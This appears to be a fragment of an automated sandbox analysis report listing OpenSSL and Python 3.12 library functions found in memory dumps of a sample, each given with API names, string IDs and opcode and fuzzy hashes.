                                                                                                                                                                                                                            • String ID: RC4(128)$SHA256
                                                                                                                                                                                                                            • API String ID: 3142812517-1400659560
                                                                                                                                                                                                                            • Opcode ID: d6a0065a6d0874dd0ff966604a2627c7be0b620d4a919fb648158f234155b9c5
                                                                                                                                                                                                                            • Instruction ID: 329456573a900f40a1046cd93248963f78f0a16143905426d3a22ef873b3c2ac
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6a0065a6d0874dd0ff966604a2627c7be0b620d4a919fb648158f234155b9c5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D015E32F0869281E3649B19A4B48BAA7A0FB41358F490336DDBDD3ADCCE3CE9519640
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_clear_flagsO_set_flags
                                                                                                                                                                                                                            • String ID: ,
                                                                                                                                                                                                                            • API String ID: 3946675294-3772416878
                                                                                                                                                                                                                            • Opcode ID: 09cb731f29b596aaff07b41d1efb186b6234dea22a9eb81ab5f732240040ee19
                                                                                                                                                                                                                            • Instruction ID: c4149d405bc5b4eedc833dac8ebd3b4489ccbbbb9c96cbf933b6964b34e80e25
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09cb731f29b596aaff07b41d1efb186b6234dea22a9eb81ab5f732240040ee19
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79016D62F052428AFB955A2190A57AC23819B95B19F988134CA2CCA6CEDBBD98C58B04
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_snprintf
                                                                                                                                                                                                                            • String ID: 3DES(168)$SHA256
                                                                                                                                                                                                                            • API String ID: 3142812517-1425382332
                                                                                                                                                                                                                            • Opcode ID: f6a822f7e7e8ce570bfc8d8c29e818f6c1a49bc9590b4984a5e4dfc449007e0a
                                                                                                                                                                                                                            • Instruction ID: e705f7dd310cdc6610352d8cf2da1689a175695835f2e6d091320d9978ae9a41
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6a822f7e7e8ce570bfc8d8c29e818f6c1a49bc9590b4984a5e4dfc449007e0a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A015E32F0869281E3649B19A4B48BAA7A0FB41358F490336DDBDD3ADCCE3CE9518640
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_snprintf
                                                                                                                                                                                                                            • String ID: DES(56)$SHA256
                                                                                                                                                                                                                            • API String ID: 3142812517-3688456565
                                                                                                                                                                                                                            • Opcode ID: 864fc7dfa8d5e77a62175dc00898ddbbd5d6343fefe8c2cb9755a45508bb71f7
                                                                                                                                                                                                                            • Instruction ID: b01918f7e1598dd7153bf7bb1bb24567e48b721e863fc6a10e5e1691437a9e1f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 864fc7dfa8d5e77a62175dc00898ddbbd5d6343fefe8c2cb9755a45508bb71f7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8015E32F0869281E3649B19A4B48BAA7A0FB41358F490336DDBDD3ADCCE3CE9519640
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: String$Err_FromUnicode_
                                                                                                                                                                                                                            • String ID: no such name
                                                                                                                                                                                                                            • API String ID: 3678473424-4211486178
                                                                                                                                                                                                                            • Opcode ID: 4348d4c1af8cee514543b61df3cc81d6ff16b058532f076f9cdf87de5dea6c2b
                                                                                                                                                                                                                            • Instruction ID: 9d132e163e15617b98f8ea9a2cc9b7d88a640acc304b622abf977d91638be0f5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4348d4c1af8cee514543b61df3cc81d6ff16b058532f076f9cdf87de5dea6c2b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20016775B1CA4292FB698B21E860BB963A4BF9C749FC40071DE6E463D8EF3CE5048740
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_clear_flagsO_set_flags
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3946675294-3916222277
                                                                                                                                                                                                                            • Opcode ID: 2909e6598d12bce70b1b28e20bd367930abf9f14cb8d6075241e2679a7713279
                                                                                                                                                                                                                            • Instruction ID: f104ea8a10b59b54a7d616cb557f69495ba6dcd90c7da38972d62072649f5428
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2909e6598d12bce70b1b28e20bd367930abf9f14cb8d6075241e2679a7713279
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0F08C62B052024AFB945A2290A57BC13819B95B08F988138CE3CCB7CFDFBD98C58B10
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ERR_set_debug.LIBCRYPTO-3(?,?,?,FFFFFFFF,00000000,?,00007FFDFF29F3FE), ref: 00007FFDFF29EF5B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem.c$read_state_machine
                                                                                                                                                                                                                            • API String ID: 488089507-3323778802
                                                                                                                                                                                                                            • Opcode ID: 7f2e7670a774fde5292a28fc6b400b68e157f67a6c15a5ceecf54c2ebdddb83f
                                                                                                                                                                                                                            • Instruction ID: dde0e89e0bc493b907df9fd7934aac2ee040f7aa617b15b329e56965bab2ba36
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f2e7670a774fde5292a28fc6b400b68e157f67a6c15a5ceecf54c2ebdddb83f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71F0A71271C1C245F752CB20A825BEE2740EB82768F8801338F7CC35CADD3C95838710
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_clear_flagsO_set_flags
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3946675294-3916222277
                                                                                                                                                                                                                            • Opcode ID: 2909e6598d12bce70b1b28e20bd367930abf9f14cb8d6075241e2679a7713279
                                                                                                                                                                                                                            • Instruction ID: f104ea8a10b59b54a7d616cb557f69495ba6dcd90c7da38972d62072649f5428
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2909e6598d12bce70b1b28e20bd367930abf9f14cb8d6075241e2679a7713279
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0F08C62B052024AFB945A2290A57BC13819B95B08F988138CE3CCB7CFDFBD98C58B10
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _PyObject_GC_New.PYTHON312(?,?,00000000,00007FFDFABD2513), ref: 00007FFDFABD25A6
                                                                                                                                                                                                                            • PyObject_GC_Track.PYTHON312(?,?,00000000,00007FFDFABD2513), ref: 00007FFDFABD25D8
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object_$Track
                                                                                                                                                                                                                            • String ID: 3.2.0
                                                                                                                                                                                                                            • API String ID: 16854473-1786766648
                                                                                                                                                                                                                            • Opcode ID: 05fdb2ae452a8d6f4b3be3f11c3efdbfda8cc49ab31c9f152460280c20d50ee3
                                                                                                                                                                                                                            • Instruction ID: fac3eabdc48a457fc13ee6925e66b9999d0afeb6863fd75f8638a14d81d99649
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 05fdb2ae452a8d6f4b3be3f11c3efdbfda8cc49ab31c9f152460280c20d50ee3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4CE0ED34B09B4691EB1D8F51A86486823A8FF08718BD40575CD6D02398EF3CE564C240
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                            • API String ID: 543922902-1080266419
                                                                                                                                                                                                                            • Opcode ID: de5fdb307b945420a9f6eed53d2437f0b09c6605f83c4cf29a178b20c6a34943
                                                                                                                                                                                                                            • Instruction ID: 0dd23b3dc01c9bf3078eb6ec83bf2d40dc512f439ed4465a8ddd3fbc802981c7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de5fdb307b945420a9f6eed53d2437f0b09c6605f83c4cf29a178b20c6a34943
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BE08C11A1D1C20BE34593B488B1AE95B019B83314FC81374D3B9C29DBDA1CA4828B02